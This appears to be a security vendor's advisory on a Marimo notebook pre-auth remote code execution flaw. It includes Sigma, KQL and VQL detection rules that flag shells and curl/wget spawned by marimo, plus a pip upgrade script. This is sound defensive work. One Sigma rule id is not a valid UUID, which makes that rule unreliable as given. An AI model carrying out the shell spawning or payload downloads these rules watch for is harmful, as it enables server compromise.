CVE-2026-39987: Critical Marimo Pre-Auth RCE Exploited in the Wild — Detection and Response

A critical security vulnerability has been identified in Marimo, an open-source Python-based reactive notebook used for data science and analysis. Tracked as CVE-2026-39987 (CVSS 9.3), this pre-authenticated remote code execution (RCE) flaw allows attackers to execute arbitrary code on the host server without requiring any credentials or user interaction.

According to findings from Sysdig, active exploitation began within 10 hours of public disclosure. Given Marimo's typical deployment in data pipelines and research environments—often with high privileges—this vulnerability represents a severe risk of supply-chain compromise and data exfiltration. Defenders must assume that unpatched instances are currently being targeted.

Technical Analysis

• CVE Identifier: CVE-2026-39987
• CVSS Score: 9.3 (Critical)
• Affected Products: Marimo (Open-source Python notebook)
• Affected Versions: All versions prior to the latest security patch (vendor advisory confirms all previous iterations are vulnerable).
• Vulnerability Type: Pre-authenticated Unauthenticated Remote Code Execution.

How the Vulnerability Works: The flaw exists in the core server component of the Marimo application. Due to insufficient validation on specific input vectors, an attacker can send a crafted malicious request to the listening Marimo server interface. This request bypasses authentication mechanisms and directly triggers an interpreter, allowing for the execution of arbitrary system commands.

Exploitation Status: There is confirmed active exploitation in the wild. Security researchers have observed attackers scanning for exposed Marimo instances and leveraging this flaw to drop webshells or cryptocurrency miners immediately following the publication of the proof-of-concept (PoC).

Detection & Response

The following detection mechanisms focus on the behavioral indicators of exploitation. Since Marimo is a development tool, it typically should not spawn system shells (like /bin/bash) or network utilities (like curl or wget) on its own in a production environment.

SIGMA Rules

---
title: Marimo Exploitation - Suspicious Shell Spawn
id: 9e5b7c1d-2a4f-4b8c-9d6e-1f3g5h7i9j0k
status: experimental
description: Detects the Marimo application spawning a shell process, a strong indicator of successful RCE exploitation.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/marimo'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
      - '/dash'
  condition: selection
falsepositives:
  - Legitimate developer debugging (rare in production containers)
level: high
---
title: Marimo Exploitation - Network Utility Execution
id: 0a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects Marimo spawning curl or wget, often used to download second-stage payloads or reverse shells.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/marimo'
    Image|endswith:
      - '/curl'
      - '/wget'
      - '/python'
  condition: selection
falsepositives:
  - Data fetching functionality within a notebook (verify with user)
level: medium

Microsoft Sentinel / Defender KQL

// Hunt for suspicious child processes spawned by Marimo
DeviceProcessEvents
| where InitiatingProcessFileName has "marimo"
| where FileName in~ ("sh", "bash", "dash", "zsh", "curl", "wget", "python", "perl")
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, FileName, CommandLine, ProcessId
| order by Timestamp desc

Velociraptor VQL

-- Hunt for suspicious child processes of Marimo
SELECT Pid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE ParentName =~ 'marimo'
  AND Name IN ('bash', 'sh', 'dash', 'zsh', 'curl', 'wget', 'python3', 'perl')

Remediation Script (Bash)

#!/bin/bash
# Remediation script for CVE-2026-39987
# Checks Marimo installation and forces an upgrade to the patched version

# Function to check if a command exists
command_exists() {
    command -v "$1" >/dev/null 2>&1
}

if command_exists marimo; then
    echo "[+] Marimo installation detected."
    echo "[+] Current Version Info:"
    pip show marimo | grep Version

    echo "[*] Attempting to upgrade Marimo via pip to patch CVE-2026-39987..."
    
    # Attempt upgrade
    pip install --upgrade marimo
    
    if [ $? -eq 0 ]; then
        echo "[+] Upgrade successful. Please verify the version below matches the latest advisory:"
        pip show marimo | grep Version
        echo "[!] ACTION REQUIRED: Restart the Marimo service to apply changes."
    else
        echo "[-] Upgrade failed. Ensure you have permissions or run with sudo."
        exit 1
    fi
else
    echo "[-] Marimo binary not found in PATH. No action taken."
fi

Remediation

1. Immediate Patching: The highest priority is to update Marimo to the latest version immediately. This vulnerability affects all versions prior to the security patch released by the vendor. Run the remediation script above or execute pip install --upgrade marimo manually.
2. Network Segmentation: Ensure Marimo notebooks are not exposed directly to the public internet. If external access is required, place the application behind a reverse proxy with strict authentication and IP allow-listing.
3. Runtime Integrity: For environments that cannot be patched immediately, implement strict egress filtering. The Marimo process should not be initiating outbound connections to the internet or non-approved internal endpoints.
4. Investigate Compromise: Given the 10-hour window to exploitation, assume unpatched instances exposed to the internet may already be compromised. Review process logs for the presence of unauthorized shells or Python processes spawned by the marimo parent process.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub